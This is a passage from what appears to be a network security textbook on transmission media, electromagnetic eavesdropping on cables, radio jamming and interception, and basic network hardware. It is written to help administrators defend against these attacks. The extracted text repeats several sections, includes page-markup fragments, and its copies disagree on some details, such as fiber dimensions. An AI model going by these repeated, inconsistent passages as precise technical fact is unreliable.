Digital communication is analogous to Morse code or the early telegraph system: certain patterns of pulses are used to represent different characters during transmission. If you examine Figure 4.1, you'll see an example of a digital transmission. When a voltage is placed on the transmission medium, this is considered a binary 1. The absence of a signal is interpreted as a binary 0.

Figure 4.1: A digital transmission plotted over time

Because this waveform is so predictable and the variation between acceptable values is so great, it is easy to determine the state of the transmission. This is important if the signal is electrical, because the introduction of noise to a circuit can skew voltage values slightly. As shown in Figure 4.2, even when there is noise in the circuit, you can still see which part of the signal is a binary 1 and which is a 0.

Figure 4.2: A digital transmission on a noisy circuit

This simple format, which allows digital communication to be so noise-resistant, can also be its biggest drawback. The information for the ASCII character A can be transmitted with a single analog wave or vibration, but transmitting the binary or digital equivalent requires eight separate waves or vibrations (to transmit 01000001). Despite this inherent drawback, digital communication is usually much more efficient than analog circuits, which require a larger amount of overhead in order to detect and correct noisy transmissions.

Note: Overhead is the amount of additional information that must be transmitted on a circuit to insure that the receiving system gets the correct data and that the data is free of errors. Typically, when a circuit requires more overhead, less bandwidth is available to transmit the actual data. This is like the packaging used for shipping. You didn't want hundreds of little Styrofoam acorns, but they're there in the box taking up space to insure your item is delivered safely.

When you have an electric circuit (such as an Ethernet network that uses twisted-pair wiring), you need to pulsate your voltage in order to transmit information. This means your voltage state is constantly changing, which introduces your first insecurity: electromagnetic interference.

Electromagnetic Interference (EMI)

EMI is produced by circuits that use an alternating signal, like analog or digital communications (referred to as an alternating current or AC circuit). EMI is not produced by circuits that contain a consistent power level (referred to as a direct current or DC circuit).

For example, if you could slice one of the wires coming from a car battery and watch the electrons moving down the wire (kids: don't try this at home), you would see a steady stream of power moving evenly and uniformly down the cable. The power level would never change: it would stay at a constant 12 volts. A car battery is an example of a DC circuit, because the power level remains stable.
When you have an electric circuit (such as an Ethernet network that uses twisted-pair wiring), you need to pulsate your voltage in order to transmit information. This means your voltage state is constantly changing, which introduces your first insecurity: electromagnetic interference.

Electromagnetic Interference (EMI)

EMI is produced by circuits that use an alternating signal, like analog or digital communications (referred to as an alternating current or an AC circuit). EMI is not produced by circuits that contain a consistent power level (referred to as a direct current or a DC circuit).

For example, if you could slice one of the wires coming from a car battery and watch the electrons moving down the wire (kids: don’t try this at home), you would see a steady stream of power moving evenly and uniformly down the cable. The power level would never change: it would stay at a constant 12 volts. A car battery is an example of a DC circuit, because the power level remains stable.

Now, let’s say you could slice the wire to a household lamp and try the same experiment (kids: definitely do not try this at home!). You would now see that, depending on the point in time when you measured the voltage on the wire, the measurement would read anywhere between –120 volts and +120 volts. The voltage level of the circuit is constantly changing. Plotted over time, the voltage level would resemble an analog signal.

As you watched the flow of electrons in the AC wire, you would notice something very interesting. As the voltage changes and the current flows down the wire, the electrons tend to ride predominantly on the surface of the wire. The center point of the wire would show almost no electron movement at all. If you increased the frequency of the power cycle, more and more of the electrons would travel on the surface of the wire, instead of at the core. This effect is somewhat similar to what happens to a water skier—the faster the boat travels, the closer to the top of the water the skier rides.

As the frequency of the power cycle increases, energy begins to radiate at a 90° angle to the flow of current. In the same way that water will ripple out when a rock breaks its surface, energy will move out from the center core of the wire. This radiation is in a direct relationship with the signal on the wire; if the voltage level or the frequency is increased, the amount of energy radiated will also increase (see Figure 4.3).

Figure 4.3: A conductor carrying an AC signal radiating EMI

This energy has magnetic properties and is the basis of how electromagnets and transformers operate. The downside to all of this is that the electromagnetic radiation can be measured in order to “sniff” the signal traveling down the wire. Electricians have had tools for this purpose for many years. Most electricians carry a device that they can simply clamp around a wire in order to measure the signal traveling through the center conductor. There are more sophisticated devices that can measure the EMI radiation coming off an electrical network cable and actually record the digital pulses traveling down the wire. Once a record of these pulses has been made, it is a simple matter to convert them from a binary format to a format readable by humans (although a serious geek is just as happy reading the information in binary format, we did specifically say “humans”).

Note
While twisted-pair cabling has become very popular due to its low cost, it is also extremely insecure. Most modern networks are wired using unshielded twisted pair. Since twisted pair is used for the transmission of electrical signals, EMI is produced. Because the cable does not use any shielding, it is extremely easy to detect the EMI radiating from each of the conductors. So while twisted pair is an excellent choice for general network use, it is not a very good selection if the information traveling along the wire needs to remain 100 percent secure.

So your first point of vulnerability is your actual network cables. These are typically overlooked when people evaluate the security of a network. While an organization may go to great lengths to secure its computer room, there may be a web of cabling running through the ceilings. This can be even more of a problem if your organization is located in shared office space and you have cabling running through common areas.

This means that a would-be attacker would never have to go near a computer room or wiring closet to collect sensitive information. A stepladder and a popped ceiling tile are all that’s needed to create an access point to your network.
A savvy attacker may even use a radio transmitter to relay the captured information to another location. This means the attacker can safely continue to collect information for an extended period of time.

Fiber Optic Cable

Fiber optic cable consists of a cylindrical glass thread center core, 62.5 microns in diameter, wrapped in cladding that protects the central core and reflects the light back into the glass conductor. The cladding is 125 microns in diameter; these two measurements are why this cabling is sometimes referred to as 62.5/125 cable. The glass is then encapsulated in a jacket of tough KEVLAR fiber, and the whole thing is sheathed in PVC or plenum-rated material. While the glass core is breakable, the KEVLAR fiber jacket helps fiber optic cable stand up to a fair amount of abuse. Figure 4.4 shows a fiber optic cable.

Figure 4.4: A stripped-back fiber optic cable

Unlike twisted-pair cable, fiber uses a light source for data transmission. This light source is typically a light-emitting diode (LED) that produces a signal in the infrared range. On the other end of the cable is another diode that receives the LED signals. The light transmission can take one of two forms: single mode or multimode.

Warning
Never look into the beam of an active fiber optic cable! The light intensity is strong enough to cause permanent blindness. If you must visually inspect a cable, first make sure that it is completely disconnected from the network. Just because a cable is dark for a moment does not mean it is inactive. The risk of blindness or visual “dead spots” is too high to take risks—unless you know the cable is completely disconnected.

Light Dispersion

You’ll see light dispersion if you shine a flashlight against a nearby wall: the light pattern on the wall will have a larger diameter than the flashlight lens. If you hold two flashlights together and shine them both against the wall, you’ll get a fuzzy area in the middle where it’s difficult to determine which light source is responsible for which portion of the illumination. The farther away from the wall you move, the larger this fuzzy area gets. This is, in effect, what limits the distance on multimode fiber (that is, if you can call 1.2 miles a distance limitation for a single cable run). As the length of the cable increases, it becomes more difficult for the diode on the receiving end to distinguish between the different light frequencies.

Single-mode fiber consists of an LED that produces a single frequency of light. This single frequency is pulsed in a digital format to transmit data from one end of the cable to another.
\nBecause multimode transmissions are light-based instead of electrical, fiber benefits from being completely \nimmune to all types of EMI monitoring. There is no radiation to monitor as a signal passes down the conductor. \nWhile it may be possible to cut away part of the sheath in order to get at the glass conductor, this might cause the \nsystem to fail thus foiling the attacker. However, newer fiber optic systems are more resilient, and ironically, more \nsusceptible to monitoring from this kind of attack. \nFiber cable has one other major benefit: it is capable of supporting large bandwidth connections. 10MB, 100MB, \nand even gigabit Ethernet are all capable of supporting fiber cable. So along with security improvements, there are \nperformance improvements. This is extremely helpful in justifying the use of fiber cable within your network—it \nallows you to satisfy both bandwidth and security concerns. If Woolly Attacker is going to attempt to tap into your \nnetwork in order to monitor transmissions, he will to want to pick a network segment with a lot of traffic so that he \ncan collect the largest amount of data. Coincidentally, these are also the segments where you would want to use \nfiber cable in order to support the large amount of data flowing though this point in the network. By using fiber \ncable on these segments, you can help to protect the integrity of your cabling infrastructure. \nBound and Unbound Transmissions \nThe atmosphere is what is referred to as an unbound medium—a circuit with no formal boundaries. It has no \nconstraints to force a signal to flow within a certain path. Twisted-pair cable and fiber optic cable are examples of \nbound media, as they restrain the signal to within the wire. An unbound transmission is free to travel anywhere. \nUnbound transmissions bring a host of security problems. Since a signal has no constraints that confine it within a \nspecific area, it becomes that much more susceptible to interception and monitoring. The atmosphere is capable of \ntransmitting a variety of signal types. The most commonly used are light and radio waves. \nLight Transmissions \nLight transmissions through the atmosphere use lasers to transmit and receive network signals. These devices \noperate similarly to a fiber cable circuit, except without the glass media. \nBecause laser transmissions use a focused beam of light, they require a clear line of sight and precise alignment \nbetween the devices. This helps to enhance system security, because it severely limits the physical area from \nwhich a signal can be monitored. The atmosphere limits the light transmission’s effective distance, however, as \nwell as the number of situations in which it can be used. \nUnbound light transmissions are also sensitive to environmental conditions—a heavy mist or snowfall can \ninterfere with their transmission properties. This means that it is very easy to interrupt a light-based circuit—thus \n" }, { "page_number": 66, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 66\ndenying users service. Still, light transmissions through the atmosphere make for a relatively secure transmission \nmedium when physical cabling cannot be used. \nRadio Waves \nRadio waves used for networking purposes are typically transmitted in the 1–20GHz range and are referred to as \nmicrowave signals. These signals can be fixed frequency or spread spectrum in nature. 
\nFixed Frequency Signals A fixed frequency signal is a single frequency used as a carrier wave for the \ninformation you wish to transmit. A radio station is a good example of a single frequency transmission. When you \ntune in to a station’s carrier wave frequency on your FM dial, you can hear the signal that is riding on it. \nA carrier wave is a signal that is used to carry other information. This information is superimposed onto the signal \n(in much the same way as noise) and the resultant wave is transmitted into the atmosphere. This signal is then \nreceived by a device called a demodulator (in effect, your car radio is a demodulator that can be set for different \nfrequencies), which removes the carrier signal and passes along the remaining information. A carrier wave is used \nto boost a signal’s power and to extend the receiving range of the signal. \nFixed frequency signals are very easy to monitor. Once an attacker knows the carrier frequency, he has all the \ninformation he needs to start receiving your transmitted signals. He also has all the information he needs to jam \nyour signal, thus blocking all transmissions. \nSpread Spectrum Signals A spread spectrum signal is identical to a fixed frequency signal, except multiple \nfrequencies are transmitted. The reason multiple frequencies are transmitted is the reduction of interference \nthrough noise. Spread spectrum technology arose during wartime, when an enemy would jam a fixed frequency \nsignal by transmitting on an identical frequency. Because spread spectrum uses multiple frequencies, it is much \nmore difficult to disrupt. \nNotice the operative words “more difficult.” It is still possible to jam or monitor spread spectrum signals. While \nthe signal varies through a range of frequencies, this range is typically a repeated pattern. Once an attacker \ndetermines the timing and pattern of the frequency changes, she is in a position to jam or monitor transmissions. \nNote \nBecause it is so easy to monitor or jam radio signals, most transmissions rely on \nencryption to scramble the signal so that it cannot be monitored by outside parties. We \ncover encryption in Chapter 9. \nTerrestrial vs. Space-Based Transmissions There are two methods that can be used to transmit both fixed \nfrequency and spread spectrum signals. These are referred to as terrestrial and space-based transmissions. \nTerrestrial Transmissions Terrestrial transmissions are completely land-based radio signals. The \nsending stations are typically transmission towers located on top of mountains or tall buildings. The \nrange of these systems is usually line of sight, although an unobstructed view is not required. \nDepending on the signal strength, 50 miles is about the maximum range achievable with a terrestrial \ntransmission system. Local TV and radio stations are good examples of industries that rely on \nterrestrial-based broadcasts. Their signals can only be received locally. \nSpace-Based Transmissions Space-based transmissions are signals that originate from a land-based \nsystem but are then bounced off one or more satellites that orbit the earth in the upper atmosphere. \nThe greatest benefit of space-based communications is range. Signals can be received from almost \nevery corner of the world. The space-based satellites can be tuned to increase or decrease the \neffective broadcast area. \nOf course, the larger the broadcast range of a signal, the more susceptible it is to being monitored. 
Choosing a Transmission Medium

You should consider a number of security issues when choosing a medium for transferring data across your network.

How Valuable Is My Data?

As you saw in earlier chapters, the typical attacker must feel like he or she has something to gain by assaulting your network. Do you maintain databases that contain financial information? If so, someone might find the payoff high enough to make it worth the risk of staging a physical attack.

Which Network Segments Carry Sensitive Data?

Your networks carry sensitive information on a daily basis. In order to protect this information, you need to understand the workflow of how it is used. For example, if you identify your organization’s accounting information as sensitive, you should know where the information is stored and who has access to it. A small workgroup with its own local server will be far more secure than an accounting database that is accessed from a remote facility using an unbound transmission medium.

Tip
Be very careful when analyzing the types of services that will be passing between your facilities. For example, e-mail is typically given little consideration, yet it usually contains more information about your organization than any other business service. Considering that most e-mail systems pass messages in the clear (if an attacker captures this traffic, it appears as plain text), e-mail should be one of your best-guarded network services.

Will an Intruder Be Noticed?

It’s easy to spot an intruder when an organization consists of three or four people. Scale this to three or four thousand, and the task becomes proportionately more difficult. If you are the network administrator, you may have no say in the physical security practices of your organization. You can, however, strive to make eavesdropping on your network a bit more difficult.

When you select a physical medium, keep in mind that you may need to make your network more resilient to attacks if other security precautions are lacking.

Are Backbone Segments Accessible?

If a would-be attacker is going to monitor your network, he is going to look for central nodes where he can collect the most information. Wiring closets and server rooms are prime targets because these areas tend to be junction points for many communication sessions. When laying out your network, pay special attention to these areas and consider using a more secure medium (such as fiber cable) when possible.

Consider these issues carefully when choosing a method of data transmission. Use the risk analysis information you collected in Chapter 2 to cost justify your choices. While increasing the level of topology security may appear to be an expensive proposition, the cost may be more than justified when compared to the cost of recovering from an intrusion.
\nUnderstanding Network Transmissions \nIt is no accident that the National Security Agency, which is responsible for setting the encryption standards for \nthe U.S. government, is also responsible for monitoring and cracking encrypted transmissions that are of interest to \nthe government. In order to know how to make something more secure, you must understand what vulnerabilities \nexist and how these can be exploited. \nThis same idea applies to network communications. In order to be able to design security into your network \ninfrastructure, you must understand how networked systems communicate with each other. Many exploits leverage \nbasic communication properties. If you are aware of these communication properties, you can take steps to insure \nthat they are not exploited. \n" }, { "page_number": 68, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 68\nDigital Communications \nDigital communication is analogous to Morse code or the early telegraph system: certain patterns of pulses are \nused to represent different characters during transmission. If you examine Figure 4.1, you’ll see an example of a \ndigital transmission. When a voltage is placed on the transmission medium, this is considered a binary 1. The \nabsence of a signal is interpreted as a binary 0. \n \nFigure 4.1: A digital transmission plotted over time \nBecause this waveform is so predictable and the variation between acceptable values is so great, it is easy to \ndetermine the state of the transmission. This is important if the signal is electrical, because the introduction of \nnoise to a circuit can skew voltage values slightly. As shown in Figure 4.2, even when there is noise in the circuit, \nyou can still see what part of the signal is a binary 1 and which is a 0. \n \nFigure 4.2: A digital transmission on a noisy circuit \nThis simple format, which allows digital communication to be so noise-resistant, can also be its biggest drawback. \nThe information for the ASCII character A can be transmitted with a single analog wave or vibration, but \ntransmitting the binary or digital equivalent requires eight separate waves or vibrations (to transmit 01000001). \nDespite this inherent drawback, digital communication is usually much more efficient than analog circuits, which \nrequire a larger amount of overhead in order to detect and correct noisy transmissions. \nNote \nOverhead is the amount of additional information that must be transmitted on a circuit to \ninsure that the receiving system gets the correct data and that the data is free of errors. \nTypically, when a circuit requires more overhead, less bandwidth is available to transmit \nthe actual data. This is like the packaging used for shipping. You didn’t want hundreds of \nlittle Styrofoam acorns, but they’re there in the box taking up space to insure your item is \ndelivered safely. \nWhen you have an electric circuit (such as an Ethernet network that uses twisted-pair wiring), you need to pulsate \nyour voltage in order to transmit information. This means your voltage state is constantly changing, which \nintroduces your first insecurity: electromagnetic interference. \nElectromagnetic Interference (EMI) \nEMI is produced by circuits that use an alternating signal, like analog or digital communications (referred to as an \nalternating current or an AC circuit). EMI is not produced by circuits that contain a consistent power level \n(referred to as a direct current or a DC circuit). 
\nFor example, if you could slice one of the wires coming from a car battery and watch the electrons moving down \nthe wire (kids: don’t try this at home), you would see a steady stream of power moving evenly and uniformly \ndown the cable. The power level would never change: it would stay at a constant 12 volts. A car battery is an \nexample of a DC circuit, because the power level remains stable. \nNow, let’s say you could slice the wire to a household lamp and try the same experiment (kids: definitely do not \ntry this at home!). You would now see that, depending on the point in time when you measured the voltage on the \n" }, { "page_number": 69, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 69\nwire, the measurement would read anywhere between –120 volts and +120 volts. The voltage level of the circuit is \nconstantly changing. Plotted over time, the voltage level would resemble an analog signal. \nAs you watched the flow of electrons in the AC wire, you would notice something very interesting. As the voltage \nchanges and the current flows down the wire, the electrons tend to ride predominantly on the surface of the wire. \nThe center point of the wire would show almost no electron movement at all. If you increased the frequency of the \npower cycle, more and more of the electrons would travel on the surface of the wire, instead of at the core. This \neffect is somewhat similar to what happens to a water skier—the faster the boat travels, the closer to the top of the \nwater the skier rides. \nAs the frequency of the power cycle increases, energy begins to radiate at a 90° angle to the flow of current. In the \nsame way that water will ripple out when a rock breaks its surface, energy will move out from the center core of \nthe wire. This radiation is in a direct relationship with the signal on the wire; if the voltage level or the frequency \nis increased, the amount of energy radiated will also increase (see Figure 4.3). \n \nFigure 4.3: A conductor carrying an AC signal radiating EMI \nThis energy has magnetic properties to it and is the basis of how electromagnets and transformers operate. The \ndownside to all of this is that the electromagnetic radiation can be measured in order to “sniff” the signal traveling \ndown the wire. Electricians have had tools for this purpose for many years. Most electricians carry a device that \nthey can simply connect around a wire in order to measure the signal traveling through the center conductor. \nThere are more sophisticated devices that can measure the EMI radiation coming off an electrical network cable \nand actually record the digital pulses traveling down the wire. Once a record of these pulses has been made, it is a \nsimple matter to convert them from a binary format to a format readable by humans (although a serious geek is \njust as happy reading the information in binary format, we did specifically say “humans”). \nNote \nWhile twisted-pair cabling has become very popular due to its low cost, it is also \nextremely insecure. Most modern networks are wired using unshielded twisted pair. Since \ntwisted pair is used for the transmission of electrical signals, EMI is produced. Because \nthe cable does not use any shielding, it is extremely easy to detect the EMI radiating from \neach of the conductors. So while twisted pair is an excellent choice for general network \nuse, it is not a very good selection if the information traveling along the wire needs to \nremain 100 percent secure. 
\nSo your first point of vulnerability is your actual network cables. These are typically overlooked when people \nevaluate the security of a network. While an organization may go to great lengths to secure its computer room, \nthere may be a web of cabling running through the ceilings. This can be even more of a problem if your \norganization is located in shared office space and you have cabling running through common areas. \nThis means that a would-be attacker would never have to go near a computer room or wiring closet to collect \nsensitive information. A stepladder and a popped ceiling tile are all that’s needed to create an access point to your \nnetwork. A savvy attacker may even use a radio transmitter to relay the captured information to another location. \nThis means the attacker can safely continue to collect information for an extended period of time. \nFiber Optic Cable \nFiber optic cable consists of a cylindrical glass thread center core 62.5 microns in diameter wrapped in cladding \nthat protects the central core and reflects the light back into the glass conductor. This is then encapsulated in a \njacket of tough KEVLAR fiber. \nThe whole thing is then sheathed in PVC or Plenum. The diameter of this outer sheath is 125 microns. The \ndiameter measurements are why this cabling is sometimes referred to as 62.5/125 cable. While the glass core is \nbreakable, the KEVLAR fiber jacket helps fiber optic cable stand up to a fair amount of abuse. Figure 4.4 shows a \nfiber optic cable. \n" }, { "page_number": 70, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 70\n \nFigure 4.4: A stripped-back fiber optic cable \nUnlike twisted-pair cable, fiber uses a light source for data transmission. This light source is typically a light-\nemitting diode (LED) that produces a signal in the visible infrared range. On the other end of the cable is another \ndiode that receives the LED signals. The type of light transmission can take one of two forms: single mode or \nmultimode. \nWarning \nNever look into the beam of an active fiber optic cable! The light intensity is strong \nenough to cause permanent blindness. If you must visually inspect a cable, first make \nsure that it is completely disconnected from the network. Just because a cable is dark \nfor a moment does not mean it is inactive. The risk of blindness or visual “dead \nspots” is too high to take risks—unless you know the cable is completely \ndisconnected. \nLight Dispersion \nYou’ll see light dispersion if you shine a flashlight against a nearby wall: the light pattern on the wall will have a \nlarger diameter than the flashlight lens. If you hold two flashlights together and shine them both against the wall, \nyou’ll get a fuzzy area in the middle where it’s difficult to determine which light source is responsible for which \nportion of the illumination. The farther away from the wall you move, the larger this fuzzy area gets. This is, in \neffect, what limits the distance on multimode fiber (that is, if you can call 1.2 miles a distance limitation for a \nsingle cable run). As the length of the cable increases, it becomes more difficult for the diode on the receiving end \nto distinguish between the different light frequencies. \n \nSingle-mode fiber consists of an LED that produces a single frequency of light. This single frequency is pulsed in \na digital format to transmit data from one end of the cable to another. 
The benefit of single-mode fiber over \nmultimode is that it is faster and will travel longer distances (in the tens-of-miles range). The drawbacks are that \nthe hardware is extremely expensive and installation can be tedious at best. Unless your company name ends with \nthe word “Telephone” or “Utility,” single-mode fiber would be overkill. \nMultimode transmissions consist of multiple light frequencies. Because the light range does not need to be quite so \nprecise as single-mode, the hardware costs for multimode are dramatically less than for single-mode. The \ndrawback of multimode fiber is light dispersion, the tendency of light rays to spread out as they travel. \nBecause multimode transmissions are light-based instead of electrical, fiber benefits from being completely \nimmune to all types of EMI monitoring. There is no radiation to monitor as a signal passes down the conductor. \nWhile it may be possible to cut away part of the sheath in order to get at the glass conductor, this might cause the \nsystem to fail thus foiling the attacker. However, newer fiber optic systems are more resilient, and ironically, more \nsusceptible to monitoring from this kind of attack. \nFiber cable has one other major benefit: it is capable of supporting large bandwidth connections. 10MB, 100MB, \nand even gigabit Ethernet are all capable of supporting fiber cable. So along with security improvements, there are \nperformance improvements. This is extremely helpful in justifying the use of fiber cable within your network—it \nallows you to satisfy both bandwidth and security concerns. If Woolly Attacker is going to attempt to tap into your \nnetwork in order to monitor transmissions, he will to want to pick a network segment with a lot of traffic so that he \ncan collect the largest amount of data. Coincidentally, these are also the segments where you would want to use \nfiber cable in order to support the large amount of data flowing though this point in the network. By using fiber \ncable on these segments, you can help to protect the integrity of your cabling infrastructure. \nBound and Unbound Transmissions \nThe atmosphere is what is referred to as an unbound medium—a circuit with no formal boundaries. It has no \nconstraints to force a signal to flow within a certain path. Twisted-pair cable and fiber optic cable are examples of \nbound media, as they restrain the signal to within the wire. An unbound transmission is free to travel anywhere. \nUnbound transmissions bring a host of security problems. Since a signal has no constraints that confine it within a \nspecific area, it becomes that much more susceptible to interception and monitoring. The atmosphere is capable of \ntransmitting a variety of signal types. The most commonly used are light and radio waves. \n" }, { "page_number": 71, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 71\nLight Transmissions \nLight transmissions through the atmosphere use lasers to transmit and receive network signals. These devices \noperate similarly to a fiber cable circuit, except without the glass media. \nBecause laser transmissions use a focused beam of light, they require a clear line of sight and precise alignment \nbetween the devices. This helps to enhance system security, because it severely limits the physical area from \nwhich a signal can be monitored. The atmosphere limits the light transmission’s effective distance, however, as \nwell as the number of situations in which it can be used. 
\nUnbound light transmissions are also sensitive to environmental conditions—a heavy mist or snowfall can \ninterfere with their transmission properties. This means that it is very easy to interrupt a light-based circuit—thus \ndenying users service. Still, light transmissions through the atmosphere make for a relatively secure transmission \nmedium when physical cabling cannot be used. \nRadio Waves \nRadio waves used for networking purposes are typically transmitted in the 1–20GHz range and are referred to as \nmicrowave signals. These signals can be fixed frequency or spread spectrum in nature. \nFixed Frequency Signals A fixed frequency signal is a single frequency used as a carrier wave for the \ninformation you wish to transmit. A radio station is a good example of a single frequency transmission. When you \ntune in to a station’s carrier wave frequency on your FM dial, you can hear the signal that is riding on it. \nA carrier wave is a signal that is used to carry other information. This information is superimposed onto the signal \n(in much the same way as noise) and the resultant wave is transmitted into the atmosphere. This signal is then \nreceived by a device called a demodulator (in effect, your car radio is a demodulator that can be set for different \nfrequencies), which removes the carrier signal and passes along the remaining information. A carrier wave is used \nto boost a signal’s power and to extend the receiving range of the signal. \nFixed frequency signals are very easy to monitor. Once an attacker knows the carrier frequency, he has all the \ninformation he needs to start receiving your transmitted signals. He also has all the information he needs to jam \nyour signal, thus blocking all transmissions. \nSpread Spectrum Signals A spread spectrum signal is identical to a fixed frequency signal, except multiple \nfrequencies are transmitted. The reason multiple frequencies are transmitted is the reduction of interference \nthrough noise. Spread spectrum technology arose during wartime, when an enemy would jam a fixed frequency \nsignal by transmitting on an identical frequency. Because spread spectrum uses multiple frequencies, it is much \nmore difficult to disrupt. \nNotice the operative words “more difficult.” It is still possible to jam or monitor spread spectrum signals. While \nthe signal varies through a range of frequencies, this range is typically a repeated pattern. Once an attacker \ndetermines the timing and pattern of the frequency changes, she is in a position to jam or monitor transmissions. \nNote \nBecause it is so easy to monitor or jam radio signals, most transmissions rely on \nencryption to scramble the signal so that it cannot be monitored by outside parties. We \ncover encryption in Chapter 9. \nTerrestrial vs. Space-Based Transmissions There are two methods that can be used to transmit both fixed \nfrequency and spread spectrum signals. These are referred to as terrestrial and space-based transmissions. \nTerrestrial Transmissions Terrestrial transmissions are completely land-based radio signals. The \nsending stations are typically transmission towers located on top of mountains or tall buildings. The \nrange of these systems is usually line of sight, although an unobstructed view is not required. \nDepending on the signal strength, 50 miles is about the maximum range achievable with a terrestrial \ntransmission system. Local TV and radio stations are good examples of industries that rely on \nterrestrial-based broadcasts. 
Their signals can only be received locally. \nSpace-Based Transmissions Space-based transmissions are signals that originate from a land-based \nsystem but are then bounced off one or more satellites that orbit the earth in the upper atmosphere. \nThe greatest benefit of space-based communications is range. Signals can be received from almost \n" }, { "page_number": 72, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 72\nevery corner of the world. The space-based satellites can be tuned to increase or decrease the \neffective broadcast area. \nOf course, the larger the broadcast range of a signal, the more susceptible it is to being monitored. As the signal \nrange increases, so does the possibility that someone knowledgeable enough to monitor your signals will be within \nyour broadcast area. \nChoosing a Transmission Medium \nYou should consider a number of security issues when choosing a medium for transferring data across your \nnetwork. \nHow Valuable Is My Data? \nAs you saw in earlier chapters, the typical attacker must feel like he or she has something to gain by assaulting \nyour network. Do you maintain databases that contain financial information? If so, someone might find the payoff \nhigh enough to make it worth the risk of staging a physical attack. \nWhich Network Segments Carry Sensitive Data? \nYour networks carry sensitive information on a daily basis. In order to protect this information, you need to \nunderstand the workflow of how it is used. For example, if you identify your organization’s accounting \ninformation as sensitive, you should know where the information is stored and who has access to it. A small \nworkgroup with its own local server will be far more secure than an accounting database that is accessed from a \nremote facility using an unbound transmission medium. \nTip \nBe very careful when analyzing the types of services that will be passing between \nyour facilities. For example, e-mail is typically given little consideration, yet it \nusually contains more information about your organization than any other business \nservice. Considering that most e-mail systems pass messages in the clear (if an \nattacker captures this traffic, it appears as plain text), e-mail should be one of your \nbest-guarded network services. \nWill an Intruder Be Noticed? \nIt’s easy to spot an intruder when an organization consists of three of four people. Scale this to three or four \nthousand, and the task becomes proportionately difficult. If you are the network administrator, you may have no \nsay in the physical security practices of your organization. You can, however, strive to make eavesdropping on \nyour network a bit more difficult. \nWhen you select a physical medium, keep in mind that you may need to make your network more resilient to \nattacks if other security precautions are lacking. \nAre Backbone Segments Accessible? \nIf a would-be attacker is going to monitor your network, he is going to look for central nodes where he can collect \nthe most information. Wiring closets and server rooms are prime targets because these areas tend to be junction \npoints for many communication sessions. When laying out your network, pay special attention to these areas and \nconsider using a more secure medium (such as fiber cable) when possible. \nConsider these issues carefully when choosing a method of data transmission. Use the risk analysis information \nyou collected in Chapter 2 to cost justify your choices. 
Basic Networking Hardware

These days there is a plethora of networking products to consider when planning your network infrastructure. There are devices for everything from connecting computer systems to the network to extending a topology’s specifications to controlling network traffic. Sometimes your choices are limited. For example, to connect an office computer to the network, you must have a network card.

Many of these devices, when used correctly, can also help to improve your network security. In this section, we will take a look at some common networking hardware and discuss which can be used to reinforce your security posture.

Repeaters

Repeaters are simple two-port signal amplifiers. They are used in a bus topology to extend the maximum distance that can be spanned on a cable run. The strength of the signal is boosted as it travels down the wire. A repeater will receive a digital signal on one of its ports, amplify it, and transmit it out the other side.

A repeater is like a typical home stereo amplifier. The amp takes the signal it receives from the CD or tape deck, amplifies the signal, and sends it on its way to the speakers. If the signal is a brand-new Radiohead CD, it simply boosts the signal and sends it on its way. If you’re playing an old Grateful Dead concert tape that is inaudible because of the amount of background hiss, the amp happily boosts this signal, as well, and sends it on its way.

Repeaters function similarly to a stereo amplifier: they simply boost whatever they receive and send it on its way. Unfortunately, the signal a repeater receives could be a good frame of data, a bad frame of data, or even background noise. A repeater does not discern data quality; it simply looks at each of the individual digital pulses and amplifies them.

A repeater provides no data segmentation. All communications that take place on one side of a repeater are passed along to the other side, whether the receiving system is on the other end of the wire or not. Again, think of a repeater as a dumb amplifier and you will get the idea.

Hubs

Hubs are probably the most common piece of network hardware next to network interface cards. Physically, they are boxes of varying sizes that have multiple female RJ45 connectors. Each connector is designed to accept one twisted-pair cable outfitted with a male RJ45 connector. This twisted-pair cable is then used to connect a single server or workstation to the hub.

Hubs are essentially multiport repeaters that support twisted-pair cables in a star topology. Each node communicates with the hub, which in turn amplifies the signal and transmits it out each of the ports (including back out to the transmitting system). As with repeaters, hubs work at the electrical level. When you design your network topology, think of hubs, which provide zero traffic control, as functionally identical to repeaters.

Wireless Hubs

A new variation of the traditional hub is the wireless hub. Using radio transmissions instead of twisted-pair cable, these hubs allow computers with wireless NICs to communicate with each other through the hub. Concerns about security have led most of the wireless hub manufacturers to include basic encryption in the wireless system.
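Whatever the medium, a hub’s forwarding rule is the same, and a few lines of Python make “zero traffic control” concrete. This is only a sketch; the frame contents are invented.

    # A hub repeats every frame out every port, with no inspection at all.
    class Hub:
        def __init__(self, port_count):
            self.ports = list(range(port_count))

        def repeat(self, in_port, frame):
            # No table, no filtering: the frame goes out every port,
            # including (as noted above) back out the port it came in on.
            return list(self.ports)

    hub = Hub(port_count=8)
    frame = {"dst": "00C08BBE0052", "data": "hello"}
    print(hub.repeat(in_port=3, frame=frame))   # [0, 1, 2, 3, 4, 5, 6, 7]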
Bridges

A bridge looks a lot like a repeater; it is a small box with two network connectors that attach to two separate portions of the network. A bridge incorporates the functionality of a repeater (signal amplification), but it actually looks at the frames of data, which is a great benefit. A common bridge is nearly identical to a repeater except for the indicator lights, as shown in Figure 4.8. A forward light flashes whenever the bridge needs to pass traffic from one collision domain to another.

Figure 4.8: A common bridge

In our discussion of Ethernet in Chapter 3, we introduced the concept of a data frame and described the information contained within the frame header. Bridges put this header information to use by monitoring the source and destination MAC address on each frame of data. By monitoring the source address, the bridge learns where all the network systems are located. It constructs a table, listing which MAC addresses are directly accessible by each of its ports. It then uses that information to play traffic cop and regulate the flow of data on the network. Let’s look at an example.

A Bridge Example

Look at the network in Figure 4.9. Betty needs to send data to the server Thoth. Because everyone on the network is required to monitor the network, Betty first listens for the transmissions of other stations. If the wire is free, Betty will then transmit a frame of data. The bridge is also watching for traffic and will look at the destination address in the header of Betty’s frame. Because the bridge is unsure of which port the system with MAC address 00C08BBE0052 (Thoth) is connected to, it amplifies the signal and retransmits it out Port B. Note that until now the bridge functionality is very similar to that of a repeater. The bridge does a little extra, however; it has learned that Betty is attached to Port A and creates a table entry with her MAC address.

Figure 4.9: Betty transmits data to the server Thoth by putting Thoth’s MAC address into the destination field of the frame.

